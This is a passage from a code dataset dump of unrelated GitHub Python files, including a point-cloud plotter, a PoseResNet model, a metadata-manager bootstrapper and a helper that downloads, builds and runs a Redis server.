ordering = ['-created'] # reverse ordering by created, i.e. newest first\n ","repo_name":"azizsigar/aziztodos","sub_path":"back/todos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11571495889","text":"#!/usr/bin/env python\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport sys\n\n\n#python3 modification\n\nif sys.version_info >= (3,0):\n\traw_input = input \n\nclass PointSet(object):\n\t\n\tdef __init__(self,filename,delimeter):\n\t\tself.X = []; self.Y = []; self.Z = []\n\t\t\n\t\tf = open(filename).readlines()\n\t\t\n\t\tfor l in f:\n\t\t\tl = l.split(delimeter)\n\t\t\tself.X.append(float(l[0]))\n\t\t\tself.Y.append(float(l[1]))\n\t\t\tself.Z.append(float(l[2]))\n\n\t\t\t\n\tdef clear_location(self):\n\t\tminX = min(self.X)\n\t\tminY = min(self.Y)\n\t\tminZ = min(self.Z)\n\t\tfor i in range(len(self.X)):\n\t\t\tself.X[i] -= minX\n\t\t\tself.Y[i] -= minY\n\t\t\tself.Z[i] -= minZ\n\t\t\n\nfig = plt.figure()\nax = fig.add_subplot(111,projection='3d')\n\nans = raw_input('Enter the file you want to plot (e.g. foo.asc):')\nd = raw_input('Enter the delimiter character: ')\n\np = PointSet(ans,d)\n\n\nax.scatter(p.X,p.Y,p.Z, c='r', marker='o')\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\n\nplt.show()\n\n\n","repo_name":"papachristoumarios/pcd-plotter","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28614146903","text":"\nfrom jetson_containers import PYTHON_VERSION, JETPACK_VERSION\n\nif JETPACK_VERSION.major >= 5:\n TORCH_TRT_VERSION = 'v1.4.0' # build setup has changed > 1.4.0 (still ironing it out on aarch64)\nelse:\n TORCH_TRT_VERSION = 'v1.0.0' # compatibility with TensorRT 8.2 and PyTorch 1.10\n \npackage['build_args'] = {\n 'PYTHON_VERSION': PYTHON_VERSION,\n 'JETPACK_MAJOR': JETPACK_VERSION.major,\n 'JETPACK_MINOR': 0 if JETPACK_VERSION.major >= 5 else 6, # only 5.0 and 4.6 are recognized\n 'TORCH_TRT_VERSION': TORCH_TRT_VERSION, \n}\n","repo_name":"dusty-nv/jetson-containers","sub_path":"packages/pytorch/torch_tensorrt/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1210,"dataset":"github-code","pt":"38"} +{"seq_id":"41156422638","text":"import json\nimport logging\nimport numpy as np\nimport os\nfrom typing import Dict, Tuple\n\nfrom moflow.config import CODE_TO_BOND, DUMMY_CODE, Config\n\n\ndef _onehot(data: np.ndarray, codes_dict: Dict[int, int], dtype=np.float32) -> np.ndarray:\n shape = [len(codes_dict), *data.shape]\n encoded = np.zeros(shape, dtype=dtype)\n for obj_key, code in codes_dict.items():\n encoded[code, data == obj_key] = 1\n return encoded\n\n\ndef encode_nodes(atomic_nums: np.ndarray, config: Config) -> np.ndarray:\n padded_data = np.full(config.max_num_nodes, DUMMY_CODE, dtype=np.uint8)\n padded_data[:len(atomic_nums)] = atomic_nums\n encoded = _onehot(padded_data, config.dataset_config.atomic_to_code).T\n return encoded\n\n\ndef encode_edges(adj: np.ndarray, config: Config) -> np.ndarray:\n padded_data = np.full((config.max_num_nodes, config.max_num_nodes), DUMMY_CODE, dtype=np.uint8)\n n, m = adj.shape\n assert n == m, 'adjacency matrix should be square'\n padded_data[:n, :n] = adj\n # we already store codes in the file - bond types are rdkit objects\n encoded = 
_onehot(padded_data, {k:k for k in CODE_TO_BOND})\n return encoded\n\n\ndef transform_fn(data: Tuple[np.ndarray], config: Config) -> Tuple[np.ndarray]:\n node, adj, *labels = data\n node = encode_nodes(node, config)\n adj = encode_edges(adj, config)\n return (node, adj, *labels)\n\n\ndef get_val_ids(config: Config, data_dir: str):\n file_path = os.path.join(data_dir, config.dataset_config.valid_idx_file)\n logging.info('loading train/valid split information from: {}'.format(file_path))\n with open(file_path) as json_data:\n data = json.load(json_data)\n\n val_ids = [int(idx)-1 for idx in data]\n return val_ids\n","repo_name":"NVIDIA/DeepLearningExamples","sub_path":"PyTorch/DrugDiscovery/MoFlow/moflow/data/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":11741,"dataset":"github-code","pt":"38"} +{"seq_id":"30334982941","text":"class Solution:\n def isPalindrome(self, head: ListNode) -> bool:\n \n if head == None:\n return True\n \n if head.next == None:\n #len of list is 1, is a palindrome\n return True \n \n curr = head\n slow = curr\n fast = curr\n \n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n \n #slow points to end of first half\n #second half\n second = slow.next\n #we reverse second half\n second = self.reverse(second)\n \n curr_second = second\n ans = True\n \n while curr and second:\n if curr.val != second.val:\n ans = False\n break #end loop\n curr = curr.next\n second = second.next\n \n #end of loop\n #put second half back\n curr_second = self.reverse(curr_second)\n \n #re-attach second half to first half\n slow.next = curr_second\n \n return ans\n\n def reverse(self, head):\n if head == None:\n return head\n curr = head\n prev = None\n temp = None\n while curr:\n temp = curr.next\n curr.next = prev\n prev = curr\n curr = temp\n return prev\n ","repo_name":"hemangbehl/Data-Structures-Algorithms_practice","sub_path":"leetcode_session3_HB/q234_SinglyLinkedList_Palindrom.py","file_name":"q234_SinglyLinkedList_Palindrom.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25707556269","text":"import torch\nimport torch.nn as nn\nfrom utils import get_logger\n\nfrom .pose_estimator import PoseEstimator\n\n\nBN_MOMENTUM = 0.1\n\n\nclass PoseResNet(PoseEstimator):\n def __init__(self, num_joints, num_layers=50):\n resnet_spec = {\n 18: (BasicBlock, [2, 2, 2, 2]),\n 34: (BasicBlock, [3, 4, 6, 3]),\n 50: (Bottleneck, [3, 4, 6, 3]),\n 101: (Bottleneck, [3, 4, 23, 3]),\n 152: (Bottleneck, [3, 8, 36, 3]),\n }\n block, layers = resnet_spec[num_layers]\n\n self.inplanes = 64\n self.deconv_with_bias = False\n\n super(PoseResNet, self).__init__(num_joints=num_joints)\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\n # used for deconv layers\n self.deconv_layers = self._make_deconv_layer(3, [256, 256, 256], [4, 4, 4])\n\n self.final_layer = nn.Conv2d(\n in_channels=256, out_channels=num_joints, kernel_size=1, stride=1, padding=0\n 
)\n self._logger = get_logger(__name__)\n self._logger.info(\"Init deconv weights from normal distribution\")\n for name, m in self.deconv_layers.named_modules():\n if isinstance(m, torch.nn.ConvTranspose2d):\n self._logger.info(\"Init {}.weight as normal(0, 0.001)\".format(name))\n self._logger.info(\"Init {}.bias as 0\".format(name))\n torch.nn.init.normal_(m.weight, std=0.001)\n if self.deconv_with_bias:\n torch.nn.init.constant_(m.bias, 0)\n elif isinstance(m, torch.nn.BatchNorm2d):\n self._logger.info(\"Init {}.weight as 1\".format(name))\n self._logger.info(\"Init {}.bias as 0\".format(name))\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n self._logger.info(\"Init final conv weights from normal distribution\")\n for m in self.final_layer.modules():\n if isinstance(m, torch.nn.Conv2d):\n self._logger.info(\"Init {}.weight as normal(0, 0.001)\".format(m))\n self._logger.info(\"Init {}.bias as 0\".format(m))\n torch.nn.init.normal_(m.weight, std=0.001)\n torch.nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(\n self.inplanes,\n planes * block.expansion,\n kernel_size=1,\n stride=stride,\n bias=False,\n ),\n nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n @staticmethod\n def _get_deconv_cfg(deconv_kernel):\n if deconv_kernel == 4:\n padding = 1\n output_padding = 0\n elif deconv_kernel == 3:\n padding = 1\n output_padding = 1\n elif deconv_kernel == 2:\n padding = 0\n output_padding = 0\n else:\n raise NotImplementedError()\n\n return deconv_kernel, padding, output_padding\n\n def _make_deconv_layer(self, num_layers, num_filters, num_kernels):\n if num_layers != len(num_filters):\n self._logger.fatal(\n \"ERROR: num_deconv_layers is different len(num_deconv_filters)\"\n )\n if num_layers != len(num_kernels):\n self._logger.fatal(\n \"ERROR: num_deconv_layers is different len(num_deconv_filters)\"\n )\n\n layers = []\n for i in range(num_layers):\n kernel, padding, output_padding = self._get_deconv_cfg(num_kernels[i])\n\n planes = num_filters[i]\n layers.append(\n nn.ConvTranspose2d(\n in_channels=self.inplanes,\n out_channels=planes,\n kernel_size=kernel,\n stride=2,\n padding=padding,\n output_padding=output_padding,\n bias=self.deconv_with_bias,\n )\n )\n layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))\n layers.append(nn.ReLU(inplace=True))\n self.inplanes = planes\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.deconv_layers(x)\n x = self.final_layer(x)\n\n return x\n\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False\n )\n\n self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=1, padding=1, bias=False\n )\n\n self.bn2 = nn.BatchNorm2d(planes, 
momentum=BN_MOMENTUM)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=stride, padding=1, bias=False\n )\n self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.conv3 = nn.Conv2d(\n planes, planes * self.expansion, kernel_size=1, bias=False\n )\n self.bn3 = nn.BatchNorm2d(planes * self.expansion, momentum=BN_MOMENTUM)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n","repo_name":"facebookresearch/multi_view_active_learning","sub_path":"pose_estimators/pose_resnet.py","file_name":"pose_resnet.py","file_ext":"py","file_size_in_byte":7625,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"72304283312","text":"import asyncio\nfrom loguru import logger\n\nasync def main():\n await asyncio.gather(task1(), task2())\n\nasync def task1():\n for n in range(5):\n logger.info(n)\n\nasync def task2():\n for n in range(5):\n logger.info(n)\n\n\nasyncio.run(main())","repo_name":"grvstick/async_tutorial","sub_path":"lesson 1/asnyc_print1.py","file_name":"asnyc_print1.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74744822191","text":"from MetadataManagerCore import config\nfrom plugin.PluginManager import PluginManager\nfrom ApplicationMode import ApplicationMode\nfrom updater.Updater import Updater\nfrom MetadataManagerCore.host.HostProcessController import HostProcessController\nfrom MetadataManagerCore.file.FileHandlerManager import FileHandlerManager\nfrom MetadataManagerCore.service.WatchDogService import WatchDogService\nfrom MetadataManagerCore.service.ServiceManager import ServiceManager\nfrom MetadataManagerCore.filtering.DocumentFilterManager import DocumentFilterManager\nfrom PySide2.QtCore import QThreadPool\nfrom PySide2 import QtCore\nfrom PySide2.QtWidgets import QApplication\nimport asset_manager\nfrom qt_extensions import qt_util\nfrom MetadataManagerCore.mongodb_manager import MongoDBManager\nfrom time import sleep\nfrom datetime import datetime\nimport logging\nfrom enum import Enum\nfrom LoaderWindow import LoaderWindow\nfrom AppInfo import AppInfo\nfrom MainWindowManager import MainWindowManager\nimport os\nimport sys\nfrom MetadataManagerCore.third_party_integrations.deadline.deadline_service import DeadlineService, DeadlineServiceInfo\nfrom MetadataManagerCore.actions.ActionManager import ActionManager\nfrom MetadataManagerCore.environment.EnvironmentManager import EnvironmentManager\nfrom 
ServiceRegistry import ServiceRegistry\n\n# Do not remove the resources_qrc import. It loads the custom resources/icons for Qt.\nimport resources_qrc\nfrom MetadataManagerCore.task_processor.TaskProcessor import TaskProcessor\nfrom MetadataManagerCore.task_processor.ActionTaskPicker import ActionTaskPicker\nimport time\nfrom ConsoleApp import ConsoleApp\nfrom MetadataManagerCore.file.PrintFileHandler import PrintFileHandler\n\n# Keep the following imports to ensure plugins have access to the modules.\nimport MetadataManagerCore.communication.messaging\n\n# Visual Scripting imports:\nfrom VisualScriptingExtensions.ExtendedVisualScripting import ExtendedVisualScripting\nfrom VisualScriptingExtensions.CodeGenerator import CodeGenerator\nimport VisualScriptingExtensions.mongodb_nodes\nimport VisualScriptingExtensions.document_action_nodes\nimport VisualScriptingExtensions.action_nodes\nimport VisualScriptingExtensions.versioning_nodes\nimport VisualScriptingExtensions.third_party_extensions.deadline_nodes\nimport VisualScriptingExtensions.third_party_extensions.photoshop_nodes\nimport VisualScriptingExtensions.environment_nodes\n\nclass Bootstrapper(object):\n def __init__(self, mode : ApplicationMode, taskFilePath: str, launcherFilename: str, loggerLevel: str = None):\n super().__init__()\n self.mode = mode\n self.taskFilePath = taskFilePath\n self.launcherFilename = launcherFilename\n self.initLogging(loggerLevel)\n\n self.logger.info(f\"Initializing application with mode: {mode} and launcher: {launcherFilename}\")\n\n SETTINGS = QtCore.QSettings(asset_manager.getMainSettingsPath(), QtCore.QSettings.IniFormat)\n \n config.RABBIT_MQ_HOST = SETTINGS.value(\"rabbit_mq_host\")\n config.RABBIT_MQ_USERNAME = SETTINGS.value(\"rabbit_mq_username\")\n config.RABBIT_MQ_PASSWORD = SETTINGS.value(\"rabbit_mq_password\")\n\n self.appInfo = AppInfo()\n self.appInfo.company = SETTINGS.value(\"company\")\n self.appInfo.appName = SETTINGS.value(\"app_name\")\n self.appInfo.mode = mode\n self.mongodbHost = SETTINGS.value(\"mongodb_host\")\n self.dbName = SETTINGS.value(\"db_name\")\n self.hostProcessController = None\n self.serviceManager = None\n self.dbManager = None\n self.serviceRegistry = ServiceRegistry()\n self.serviceRegistry.appInfo = self.appInfo\n\n self.restartRequested = False\n self.updater = None\n\n dbInitTimeout = None\n if self.mode == ApplicationMode.GUI:\n self.app = QApplication([])\n self.app.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)\n self.loaderWindow = LoaderWindow(self.app, self.appInfo, self.logger, self)\n elif self.mode == ApplicationMode.Console:\n dbInitTimeout = 60.0\n self.consoleApp = ConsoleApp(self.appInfo, self.serviceRegistry, taskFilePath=self.taskFilePath, initTimeout = 240.0)\n \n QThreadPool.globalInstance().start(qt_util.LambdaTask(self.initDataBaseManager, dbInitTimeout))\n\n def requestRestart(self):\n self.restartRequested = True\n self.mainWindowManager.close()\n\n def run(self):\n if self.mode == ApplicationMode.GUI:\n status = self.app.exec_()\n elif self.mode == ApplicationMode.Console:\n # Wait for initialization completion:\n status = self.consoleApp.exec()\n self.logger.info(\"Quitting application...\")\n self.shutdown()\n else:\n status = None\n self.logger.error(f'Unknown Mode: {self.mode}')\n\n return status\n\n def shutdown(self):\n for service in self.serviceRegistry.services:\n try:\n service.shutdown\n hasShutdownFunction = True\n except:\n hasShutdownFunction = False\n\n if hasShutdownFunction: \n service.shutdown()\n\n if self.updater:\n 
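# self.updater stays None when no launcher filename was supplied (see setupUpdater), so guard before shutting it down\n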
self.updater.shutdown()\n\n if self.appInfo.initialized:\n self.save()\n\n self.dbManager.disconnect()\n\n QtCore.QThreadPool.globalInstance().waitForDone()\n\n def initLogging(self, loggerLevel: str):\n logFilename = asset_manager.getLogFilePath()\n if not os.path.isdir(os.path.dirname(logFilename)):\n os.makedirs(os.path.dirname(logFilename))\n\n strToLoggerLevel = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n }\n\n if loggerLevel:\n loggerLevel = strToLoggerLevel.get(loggerLevel.lower())\n\n if not loggerLevel:\n loggerLevel = logging.INFO\n\n fileHandler = logging.FileHandler(logFilename)\n fileHandler.setLevel(loggerLevel)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setLevel(loggerLevel)\n\n logging.basicConfig(format='%(asctime)s %(name)s:%(threadName)s %(levelname)s: %(message)s', \n datefmt='%H:%M:%S', handlers=[fileHandler, consoleHandler], level=logging.DEBUG)\n\n self.logger = logging.getLogger(__name__)\n\n def initDataBaseManager(self, timeout=None):\n connected = False\n self.dbManager = MongoDBManager(self.mongodbHost, self.dbName)\n\n tStart = time.time()\n while not connected and (timeout == None or time.time() - tStart < timeout) and not self.appInfo.applicationQuitting:\n self.logger.info(\"Connecting to database...\")\n\n try:\n self.dbManager.connect()\n self.logger.info(\"Connected.\")\n connected = True\n except Exception as e:\n if self.appInfo.applicationQuitting:\n return\n\n print(f\"Error: {str(e)}\")\n sleep(2)\n self.logger.info(\"Failed to connect. Retrying...\")\n sleep(1)\n continue\n\n if not connected:\n qt_util.runInMainThread(self.onDBManagerConnectionTimeout)\n return\n \n self.onDBManagerConnected()\n\n def onDBManagerConnectionTimeout(self):\n if self.app:\n self.shutdown()\n self.app.quit()\n\n def initServices(self):\n self.serviceRegistry.deadlineService = DeadlineService(None)\n self.serviceRegistry.services.append(self.serviceRegistry.deadlineService)\n\n self.serviceRegistry.actionManager = ActionManager()\n self.serviceRegistry.services.append(self.serviceRegistry.actionManager)\n \n self.serviceRegistry.environmentManager = EnvironmentManager()\n self.serviceRegistry.services.append(self.serviceRegistry.environmentManager)\n\n self.serviceRegistry.dbManager = self.dbManager\n self.serviceRegistry.services.append(self.dbManager)\n\n self.serviceRegistry.documentFilterManager = DocumentFilterManager(self.serviceRegistry.dbManager)\n self.serviceRegistry.services.append(self.serviceRegistry.documentFilterManager)\n\n self.serviceRegistry.codeGenerator = CodeGenerator(self.serviceRegistry.actionManager, self.serviceRegistry.documentFilterManager)\n self.serviceRegistry.services.append(self.serviceRegistry.codeGenerator)\n\n self.serviceRegistry.taskProcessor = TaskProcessor()\n actionTaskPicker = ActionTaskPicker(self.serviceRegistry.actionManager, self.serviceRegistry.documentFilterManager)\n self.serviceRegistry.taskProcessor.addTaskPicker(actionTaskPicker)\n self.serviceRegistry.services.append(self.serviceRegistry.taskProcessor)\n\n VisualScriptingExtensions.mongodb_nodes.DB_MANAGER = self.dbManager\n VisualScriptingExtensions.environment_nodes.ENVIRONMENT_MANAGER = self.serviceRegistry.environmentManager\n VisualScriptingExtensions.third_party_extensions.deadline_nodes.DEADLINE_SERVICE = self.serviceRegistry.deadlineService\n\n self.serviceManager = ServiceManager(self.dbManager, self.hostProcessController, self.serviceRegistry, 
self.mode == ApplicationMode.Console)\n self.serviceRegistry.serviceManager = self.serviceManager\n self.serviceRegistry.services.append(self.serviceManager)\n self.serviceManager.registerServiceClass(WatchDogService)\n\n self.fileHandlerManager = FileHandlerManager()\n self.serviceRegistry.fileHandlerManager = self.fileHandlerManager\n self.serviceRegistry.services.append(self.fileHandlerManager)\n\n pluginFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"plugins\")\n privatePluginFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"private\", \"plugins\")\n self.serviceRegistry.pluginManager = PluginManager([pluginFolder, privatePluginFolder], self.serviceRegistry, self.appInfo)\n self.serviceRegistry.services.append(self.serviceRegistry.pluginManager)\n\n visualScriptingSaveDataFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"VisualScripting_SaveData\")\n visualScriptingPrivateSaveDataFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"private\", \"VisualScripting_SaveData\")\n self.serviceRegistry.visualScripting = ExtendedVisualScripting([visualScriptingSaveDataFolder, visualScriptingPrivateSaveDataFolder], self.serviceRegistry.actionManager, \n self.serviceRegistry.documentFilterManager,\n self.serviceRegistry.codeGenerator)\n self.serviceRegistry.services.append(self.serviceRegistry.visualScripting)\n\n def onDBManagerConnected(self):\n self.initHostProcessController()\n\n self.initServices()\n self.load()\n self.appInfo.initialized = True\n\n if self.mode == ApplicationMode.GUI:\n qt_util.runInMainThread(self.loaderWindow.hide)\n qt_util.runInMainThread(self.setupMainWindowManager)\n qt_util.runInMainThread(self.setupUpdater)\n \n def setupUpdater(self):\n self.updater = Updater(self.launcherFilename, self, self.mainWindowManager.window) if self.launcherFilename else None\n\n def initHostProcessController(self):\n self.hostProcessController = HostProcessController(self.dbManager)\n self.hostProcessController.thisHost.onRequestedApplicationClose.subscribe(self.onRequestedApplicationClose)\n self.serviceRegistry.hostProcessController = self.hostProcessController\n self.serviceRegistry.services.append(self.hostProcessController)\n QThreadPool.globalInstance().start(qt_util.LambdaTask(self.hostProcessController.run))\n\n def onRequestedApplicationClose(self):\n if self.mainWindowManager:\n qt_util.runInMainThread(self.mainWindowManager.close)\n\n def setupMainWindowManager(self):\n self.mainWindowManager = MainWindowManager(self.app, self.appInfo, self.serviceRegistry, self)\n self.serviceRegistry.mainWindowManager = self.mainWindowManager\n \n settings = QtCore.QSettings(self.appInfo.company, self.appInfo.appName)\n self.serviceRegistry.pluginManager.load(settings, self.dbManager)\n self.mainWindowManager.pluginManagerViewer.loadPluginsFolders()\n self.serviceRegistry.visualScripting.load(settings, self.dbManager)\n\n self.mainWindowManager.show()\n\n def load(self, settings = None):\n if settings == None:\n settings = QtCore.QSettings(self.appInfo.company, self.appInfo.appName)\n \n for service in self.serviceRegistry.services:\n # Skip PluginManager if in GUI mode. 
It will be loaded after the main window manager is initialized.\n if self.mode == ApplicationMode.GUI:\n if isinstance(service, PluginManager):\n continue\n\n if isinstance(service, ExtendedVisualScripting):\n continue\n\n if hasattr(service, 'load') and callable(service.load):\n service.load(settings, self.dbManager)\n\n def save(self, settings = None):\n if self.appInfo.mode == ApplicationMode.Console:\n return\n \n self.logger.info("Saving...")\n if settings is None:\n settings = QtCore.QSettings(self.appInfo.company, self.appInfo.appName)\n\n for service in self.serviceRegistry.services:\n # Call save() only on services that actually provide it.\n if hasattr(service, 'save') and callable(service.save):\n service.save(settings, self.dbManager)\n\n self.logger.info("Saving completed.")","repo_name":"compix/MetadataManager","sub_path":"Bootstrapper.py","file_name":"Bootstrapper.py","file_ext":"py","file_size_in_byte":14099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
{"seq_id":"20462693703","text":"\"\"\"\nWritten by Phani Pavan k .\nuse this code as per gplv3 guidelines.\n\"\"\"\nimport pgrep\nimport re\nimport shutil\nimport os\nimport tarfile\nimport subprocess as sp\nfrom tqdm.auto import tqdm\nimport requests as req\nfrom .ui import *\nimport sys\nfrom threading import Thread\nfrom multiprocessing import Process\nimport asyncio\nimport time\nREDIS_STABLE_URL = \"http://download.redis.io/redis-stable.tar.gz\"\n\n\nclass RedisServer:\n def __init__(self) -> None:\n self.proc = None\n self.procID = None\n\n @staticmethod\n def _makeLogFolder():\n os.makedirs('redis_server/installLogs', exist_ok=True)\n # ? Implement saving logs to this folder.\n\n @staticmethod\n def _downloadRedis():\n os.makedirs('redis_server', exist_ok=True)\n lst = os.listdir('./redis_server')\n if 'redis-stable.tar.gz' in lst:\n debug('Redis Source already found, skipping download', Log.WRN)\n else:\n debug('Downloading Redis Stable Source')\n with req.get(REDIS_STABLE_URL, stream=True) as r:\n size = int(r.headers.get('Content-Length'))\n with tqdm.wrapattr(r.raw, 'read', total=size, desc='') as data:\n with open('redis_server/redis-stable.tar.gz', 'wb') as fil:\n shutil.copyfileobj(data, fil)\n debug('Download Done', Log.SUC)\n\n @staticmethod\n def _findSource():\n lst = os.listdir('./redis_server')\n if 'redis-stable' in lst:\n debug('Redis Already Extracted', Log.WRN)\n else:\n debug('Extracting Source')\n tarfile.open(\n 'redis_server/redis-stable.tar.gz').extractall('./redis_server/')\n debug('Done Extracting Source', Log.SUC)\n\n @staticmethod\n def _build():\n # Build on a third of the available cores (plus one below); fall back to one core when the count is unknown.\n coresToBuild = os.cpu_count()//3 if os.cpu_count() is not None else 1\n if 'src' in os.listdir('redis_server/redis-stable') and 'redis-server' in os.listdir('./redis_server/redis-stable/src'):\n # os.chdir('redis_server/redis-stable')\n debug('Redis Already Built', Log.WRN)\n else:\n debug('Running Redis Build On ' +\n str(coresToBuild+1)+' Cores')\n anim = Loader(desc='Building ').start()\n os.chdir('redis_server/redis-stable')\n x = sp.run(['make -j'+str(coresToBuild+1)],\n capture_output=True, text=True, shell=True)\n anim.stop()\n os.chdir('../../')\n debug('Done Building', Log.SUC)\n\n @staticmethod\n def _setupLink():\n if 'redis-server' in os.listdir('./redis_server'):\n debug('Redis Already setup', Log.WRN)\n else:\n debug('Setting up Redis Server')\n y = sp.run(['chmod +x 
./redis_server/redis-stable/src/redis-server'],\n shell=True, text=True, capture_output=True)\n # sp.run(['ls'])\n y = sp.run(['ln -s ./redis-stable/src/redis-server ./redis_server/redis-server'],\n shell=True, text=True, capture_output=True)\n y = sp.run(['chmod +x ./redis_server/redis-server'],\n shell=True, text=True, capture_output=True)\n debug('Redis Set', Log.SUC)\n\n @staticmethod\n def _verify():\n debug('Veryfying Redis Install')\n # sp.run(['ls', '-l'])\n # sp.run(['pwd'])\n z = sp.run(['./redis_server/redis-server --version'],\n shell=True, capture_output=True, text=True)\n regexp = re.search('Redis server v=(.*) sha', z.stdout)\n if regexp.group(0):\n debug('Redis Version '+regexp.group(1)+' Found')\n debug('Redis working fine', Log.SUC)\n return 1\n else:\n return 0\n\n def _setProcID(self):\n if self.procID == None and self.proc != None:\n try:\n self.procID = pgrep.pgrep(\n r\"-f 'redis_server\\/redis-server \\*\\:6379'\")[0]\n except IndexError as e:\n debug(\"Unable to set PID\", Log.ERR)\n\n def install(self, saveLogs: bool = False, ):\n if sys.platform.lower() != 'linux':\n debug('OS not Linux, install redis manually', Log.ERR)\n debug(\n 'Support for intalling on other OSs will be implemented in the future.', Log.WRN)\n return\n if saveLogs:\n RedisServer._makeLogFolder()\n RedisServer._downloadRedis()\n RedisServer._findSource()\n RedisServer._build()\n RedisServer._setupLink()\n return RedisServer._verify()\n\n async def _startServer(self, threading: bool = False):\n def runServer():\n sp.run('./redis_server/redis-server',\n capture_output=True, text=True, shell=False)\n\n if threading:\n self.proc = Thread(target=runServer)\n else:\n self.proc = Process(target=runServer)\n self.proc.start()\n while not self.proc.is_alive():\n pass\n # self.procID = self.proc.pid\n # print('new: {} old: {}'.format(self.procID, pgrep.pgrep(\n # r\"-f 'redis_server\\/redis-server \\*\\:6379'\")[0]))\n self._setProcID()\n\n def startServer(self):\n if self.proc is None:\n asyncio.run(self._startServer())\n time.sleep(0.5)\n else:\n debug('Redis Server already running manually', Log.WRN)\n\n def stopServer(self):\n if self.proc is None:\n debug('Redis Server not running', Log.WRN)\n else:\n self._setProcID()\n self.proc.terminate()\n if self.procID != None:\n os.kill(self.procID, 15)\n anim = Loader(desc='Stopping Redis Server ').start()\n while self.proc.is_alive():\n pass\n time.sleep(0.5)\n anim.stop()\n # if self.procID\n debug('Redis Server stopped', Log.SUC)\n print('\\n')\n self.proc = None\n self.procID = None\n\n\nif __name__ == \"__main__\":\n a = RedisServer()\n a.install()\n a.startServer()\n print(a.procID)\n time.sleep(5)\n a.stopServer()\n","repo_name":"Narasimha1997/redis-pydict","sub_path":"redis_pydict/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"38"} +{"seq_id":"72299689711","text":"import time\n\ndef read_input():\n with open('input.txt') as f: \n grid=[]\n lines = f.readlines()\n for line in lines:\n grid.append(list(map(int,line.strip())))\n return grid\n f.close()\n\ndef 